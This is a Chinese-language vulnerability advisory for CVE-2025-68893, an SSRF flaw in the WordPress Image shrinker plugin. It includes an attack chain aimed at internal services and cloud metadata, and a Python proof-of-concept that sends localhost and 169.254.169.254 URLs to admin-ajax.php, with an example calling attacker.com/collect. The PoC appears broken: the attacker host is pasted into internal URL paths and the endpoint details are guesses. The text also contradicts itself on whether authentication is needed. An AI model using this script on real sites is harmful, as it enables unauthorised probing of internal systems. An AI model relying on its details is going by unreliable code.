CVE-2025-68893 WordPress Image shrinker插件SSRF漏洞

漏洞信息

漏洞编号

CVE-2025-68893

漏洞类型

服务器端请求伪造（SSRF）

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Image shrinker (wp-image-shrinker)

漏洞概述

CVE-2025-68893是HETWORKS开发的WordPress Image shrinker插件中存在的一个服务器端请求伪造（SSRF）安全漏洞。该插件主要用于压缩WordPress网站中的图片文件，然而在处理图片URL时存在安全缺陷，攻击者可以通过构造恶意的URL参数，利用存在漏洞的功能向内部网络资源发起请求。漏洞的CVSS评分为4.9，属于中等严重程度，攻击复杂度较低，无需高权限即可利用。由于该漏洞允许攻击者绕过防火墙限制访问内部系统资源，可能导致敏感数据泄露、内部服务探测等安全问题。受影响版本为插件1.1.0及以下所有版本，建议用户尽快升级到最新版本以修复该安全风险。

技术细节

服务器端请求伪造（SSRF）漏洞源于WordPress Image shrinker插件在处理用户提交的图片URL时，未对输入的URL进行充分的验证和过滤。攻击者可以通过插件的图片压缩功能，提交包含恶意构造的URL参数，这些URL可能指向内部网络地址（如localhost、127.0.0.1或内部IP段）。当插件服务器端代码执行HTTP请求时，会携带服务器的身份向目标地址发起请求，从而绕过网络边界防护。由于服务器通常具有访问内部资源的权限，攻击者可以利用此漏洞探测内网服务、读取本地文件内容或访问内部API接口。攻击者无需认证即可利用该漏洞，仅需在WordPress站点上拥有低权限账户即可触发漏洞利用过程。

攻击链分析

STEP 1

步骤1

攻击者识别目标WordPress网站并确认安装了wp-image-shrinker插件（版本<=1.1.0）

STEP 2

步骤2

攻击者构造包含恶意URL的请求包，将URL指向内部网络地址或元数据服务端点

STEP 3

步骤3

通过插件的图片压缩功能提交构造的URL，触发服务器端向目标地址发起HTTP请求

STEP 4

步骤4

服务器携带自身身份向内部资源发起请求，攻击者通过响应内容获取敏感信息或探测内网服务

STEP 5

步骤5

攻击者利用获取的信息进行进一步渗透攻击，如访问内部API、读取云服务元数据等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-68893 PoC - WordPress Image shrinker SSRF
"""
import requests
import sys

def exploit_ssrf(target_url, attacker_server):
    """
    Exploit SSRF vulnerability in WordPress Image shrinker plugin
    target_url: URL of the WordPress site
    attacker_server: Your controlled server to receive SSRF requests
    """
    # Target endpoint (typical WordPress admin ajax endpoint)
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    
    # SSRF payload targeting internal resources
    payloads = [
        f"http://localhost/{attacker_server}",
        f"http://127.0.0.1/{attacker_server}",
        f"http://169.254.169.254/{attacker_server}"  # AWS metadata
    ]
    
    for payload in payloads:
        data = {
            'action': 'wp_image_shrinker',  # Plugin action
            'image_url': payload,
            'quality': '80'
        }
        
        try:
            print(f"[*] Sending payload: {payload}")
            response = requests.post(endpoint, data=data, timeout=10)
            print(f"[*] Response status: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <target_url> <attacker_server>")
        print(f"Example: {sys.argv[0]} http://victim.com http://attacker.com/collect")
        sys.exit(1)
    
    target_url = sys.argv[1]
    attacker_server = sys.argv[2]
    exploit_ssrf(target_url, attacker_server)

影响范围

wp-image-shrinker <= 1.1.0

防御指南

临时缓解措施

在官方修复版本发布之前，可临时禁用wp-image-shrinker插件，或通过Web应用防火墙（WAF）规则限制对插件相关API端点的访问。同时监控服务器出站流量，及时发现异常的内部网络请求。